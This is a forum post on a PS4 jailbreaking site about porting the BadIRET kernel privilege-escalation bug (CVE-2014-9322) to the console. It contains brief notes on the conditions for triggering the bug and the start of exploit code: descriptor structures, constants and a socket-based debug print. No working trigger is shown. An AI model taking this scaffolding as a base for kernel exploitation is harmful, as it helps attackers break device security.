Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter SorenAlke       1      
Status
Not open for further replies.

SorenAlke

Developer
Senior Member
Contributor
https://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
  • again the short hand perequisites for triggering the vulnerability require you to be able map memory depending on your host platform and system specifics related to satisfying these conditions.
  • in this case we are dealing with a "amd jaguar apu" so you can already kind of guess that mapping is obviously by the multiple of the page size set for your system.
  • with that said seeing as badiret has already been patched. no one will probably care for this. but while it is good to never bite the hand that feeds you. its also good to be able 2 c what is in plain sight.
Code:
#include "threadshit.h"

#define printf(format, ...)\
   do {\
     char buffer[512];\
     int size = sprintf(buffer, format, ##__VA_ARGS__);\
     sceNetSend(sock, buffer, size, 0);\
   } while(0)

#define CORE 6

#define FALSE_SS_BASE  0x10000UL
#define MAP_SIZE  0x10000
#define MAP_ANON   0x0002
#define I386_SET_LDT   1
#define   LDT_AUTO_ALLOC   0xffffffff
#define   SDT_MEMRWA   19
#define   AMD64_GET_GSBASE 130
#define AMD64_SET_GSBASE 131

struct idt_ptr_struct
{
   uint16_t limit;  // Size of IDT table
   uint64_t base;  // Base address of IDT table
} __attribute__((packed));

struct idt_entry_struct
{
   uint16_t target_offset_low;
   uint16_t target_selector;
   uint8_t  ist_reserved_bits;
   uint8_t  access_bits;
   uint16_t target_offset_mid;
   uint32_t target_offset_high;
   uint32_t reserved;
} __attribute__((packed));

typedef struct idt_entry_struct idt_entry_t;
typedef struct idt_ptr_struct idt_ptr_t;

struct   user_segment_descriptor {
   uint64_t sd_lolimit:16;   /* segment extent (lsb) */
   uint64_t sd_lobase:24;     /* segment base address (lsb) */
   uint64_t sd_type:5;     /* segment type */
   uint64_t sd_dpl:2;     /* segment descriptor priority level */
   uint64_t sd_p:1;     /* segment descriptor present */
   uint64_t sd_hilimit:4;     /* segment extent (msb) */
   uint64_t sd_xx:1;     /* unused */
   uint64_t sd_long:1;     /* long mode (cs only) */
   uint64_t sd_def32:1;     /* default 32 vs 16 bit size */
   uint64_t sd_gran:1;     /* limit granularity (byte/page units)*/
   uint64_t sd_hibase:8;     /* segment base address  (msb) */
} __attribute__((packed));
 
Status
Not open for further replies.
Back
Top